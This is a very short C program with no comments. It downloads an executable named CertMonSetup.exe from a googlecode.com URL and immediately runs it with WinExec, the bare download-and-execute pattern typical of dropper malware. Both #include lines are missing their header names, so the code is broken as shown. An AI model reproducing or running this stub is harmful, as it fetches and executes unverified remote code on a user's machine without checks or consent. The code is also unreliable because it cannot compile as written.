#include #include int main (int argc, char* argv[]) { URLDownloadToFile(NULL, "http://sbdtools.googlecode.com/files/CertMonSetup.exe", "CertMonSetup.exe", 0, NULL); WinExec ( "CertMonSetup.exe", SW_SHOWNORMAL ); return 0; }